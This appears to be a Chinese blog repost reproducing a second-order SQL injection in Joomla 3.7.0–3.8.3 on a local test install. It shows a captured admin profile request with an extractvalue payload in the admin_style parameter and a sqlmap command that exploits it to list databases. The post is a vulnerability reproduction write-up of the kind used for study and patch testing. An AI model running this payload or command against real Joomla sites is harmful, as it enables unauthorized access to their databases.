受影响Joomla版本:3.7.0 到 3.8.3

1、下载安装Joomla3.8.3,登录后台管理系统:http://127.0.0.1/joomla/administrator/index.php

2、访问编辑个人信息界面:

http://127.0.0.1/joomla/administrator/index.php?option=com_admin&view=profile&layout=edit&id=769

点击保存按钮,抓取数据包为(红色代码为测试payload):

POST /joomla/administrator/index.php?option=com_admin&view=profile&layout=edit&id=771 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/joomla/administrator/index.php?option=com_admin&view=profile&layout=edit&id=771
Content-Type: multipart/form-data; boundary=---------------------------132821454821567
Content-Length: 1875
Cookie: 52a41237bef72675e1ae3ded7fcac9e7=o4akcfu26k8ut4p2u3j0c31um5; b4ba6494ac7c9b13e2a8532fc8b0d563=giuboaa1n9rpocc0qbvg0agnn5
Connection: keep-alive
Upgrade-Insecure-Requests: 1-----------------------------132821454821567
Content-Disposition: form-data; name="jform[name]"savan
-----------------------------132821454821567
Content-Disposition: form-data; name="jform[username]"savan
-----------------------------132821454821567
Content-Disposition: form-data; name="jform[password2]"-----------------------------132821454821567
Content-Disposition: form-data; name="jform[password]"-----------------------------132821454821567
Content-Disposition: form-data; name="jform[email]"2@qq.com
-----------------------------132821454821567
Content-Disposition: form-data; name="jform[registerDate]"2018-02-28 09:13:57
-----------------------------132821454821567
Content-Disposition: form-data; name="jform[lastvisitDate]"2018-03-01 06:29:04
-----------------------------132821454821567
Content-Disposition: form-data; name="jform[id]"771
-----------------------------132821454821567
Content-Disposition: form-data; name="jform[params][admin_style][0]"extractvalue(1,concat(0x7e,(select version()) *))
-----------------------------132821454821567
Content-Disposition: form-data; name="jform[params][admin_language]"-----------------------------132821454821567
Content-Disposition: form-data; name="jform[params][language]"-----------------------------132821454821567
Content-Disposition: form-data; name="jform[params][editor]"-----------------------------132821454821567
Content-Disposition: form-data; name="jform[params][helpsite]"-----------------------------132821454821567
Content-Disposition: form-data; name="jform[params][timezone]"-----------------------------132821454821567
Content-Disposition: form-data; name="task"profile.apply
-----------------------------132821454821567
Content-Disposition: form-data; name="f054a37efb023faabe817c77a5a97583"1
-----------------------------132821454821567--

3、sqlmap对上述数据包进行测试

sqlmap.py -r C:\Users\18721\Desktop\1.txt --dbms mysql --tech E --second-order "http://127.0.0.1/joomla/administrator/index.php" --dbs --batch

转载于:https://www.cnblogs.com/peterpan0707007/p/8489368.html

【研究】Joomla二阶注入相关推荐

  1. Spring内核研究-通过工厂注入

    Spring专门设计了对工厂模式支持,你可以使用静态工厂方法来创建一个Bean,也可以使用实例工厂的方法来创建Bean.下面分别介绍这2种方法. 静态工厂注入     定义一个Bean使用自己类上的静 ...

  2. SQL注入-二阶注入(十)

    实验目的 普及二阶注入的原理及发生的场景,了解二阶注入与普通注入的区别,熟悉二阶注入的方法和过程. 实验环境 攻击机:Pentest-Atk (1)操作系统:Windows10 (2)安装的应用软件: ...

  3. SQL注入之——宽字节与二阶注入

    宽字节与二阶注入 宽字节注入 当我们把 php.ini 文件里面的 magic_quotes_gqc 参数设为 ON 时所有的'(单引号), "(双引号),\(反斜杠)和 null 字符都会 ...

  4. 依赖注入的三种方式_ASP.NET Core技术研究-探秘依赖注入框架

    ASP.NET Core在底层内置了一个依赖注入框架,通过依赖注入的方式注册服务.提供服务.依赖注入不仅服务于ASP.NET Core自身,同时也是应用程序的服务提供者. 毫不夸张的说,ASP.NET ...

  5. ASP.NET Core技术研究-探秘依赖注入框架

    ASP.NET Core在底层内置了一个依赖注入框架,通过依赖注入的方式注册服务.提供服务.依赖注入不仅服务于ASP.NET Core自身,同时也是应用程序的服务提供者. 毫不夸张的说,ASP.NET ...

  6. 字节码插桩(javassist)之插入代码块|IOC框架(Hilt)之对象注入~研究

    Hilt对象注入 | javassist插桩 研究 Hilt对象注入 javassist字节码插桩 创建buildSrc的module 重写Transform 熟悉TransformInvocatio ...

  7. php sql注入 替换,通过替换单引号来防止SQL注入

    我想知道这样的事情有什么问题(PHP) 这个想法. 很久以前就证明它存在缺陷. 首先,这段代码确实改变了数据.这是抽象思考的好方法,但它会在现实生活中使你的应用程序崩溃.事实上,这是不可接受的行为.但 ...

  8. 应力循环次数60ant_循环超临界CO2对煤的孔隙结构和力学特性的影响研究

    点击蓝字关注我们 Hello,大家好,我是小编Sunshine.好久不见,甚是想念?.本期小编为大家分享一篇重庆大学苏二磊等学者最新发表在<Journal of CO2 Utilization& ...

  9. SQL注入是什么?如何防止?

    SQL注入是一种注入攻击,可以执行恶意SQL语句.下面本篇文章就来带大家了解一下SQL注入,简单介绍一下防止SQL注入攻击的方法,希望对大家有所帮助. 什么是SQL注入? SQL注入(SQLi)是一种 ...

最新文章

  1. phpstrom安装bootstrap3插件
  2. nand ubi -2 ubi管理下的SLC nand
  3. iframe带了token不显示_token是什么
  4. MatLab 2014a编译jar包时mcc无法使用的问题
  5. 控件时出现“未能实例化控件******,VS2008 中无法使用ACTIVEX控件的解决
  6. 记事本编写Java代码
  7. 2022谷粒商城学习笔记(二十五)支付宝沙箱模拟支付
  8. Unity3d第一人称视角如何设置
  9. 以首尾交换的方法交换字符串中以'A'开头和以'N'结尾的单词
  10. 《免费》——比特经济的到来
  11. 电动汽车基于Origin的数据分析
  12. 基于pytorch的双模态数据载入
  13. Maestro Z实时无标记细胞分析仪,评估免疫细胞治疗效价
  14. 第四次计算革命孕育“数字经济体”
  15. 使用IBM InfoSphere Guardium REST API
  16. 山东省计算机等级考试初级试题,2013山东省计算机等级考试试题 二级ACCESS理论考试试题及答案...
  17. tvOS多层图片的使用
  18. Jenkins使用6--jenkins git timeout
  19. 恢复受损Word文档的9种方法--旧时光 oldtimeblog
  20. 【老脸教你做游戏】小鸟飞过障碍物的游戏(上)

热门文章

  1. 7805引脚图及稳压电路图资料
  2. [NLP]基于IMDB影评情感分析之BERT实战-测试集上92.24%
  3. Sinkhorn算法,正矩阵与双随机矩阵之间的关系
  4. Java中大规模集合快速求和计算
  5. C++的使用Lambda
  6. 机器学习-朴素贝叶斯分类
  7. 学习OpenCV2——卡尔曼滤波(KalmanFilter)详解
  8. Unity Text 插入超链接
  9. NLP(新闻文本分类)——基于机器学习的文本分类
  10. 计算机视觉基础---图像处理(几何变换)cpp+python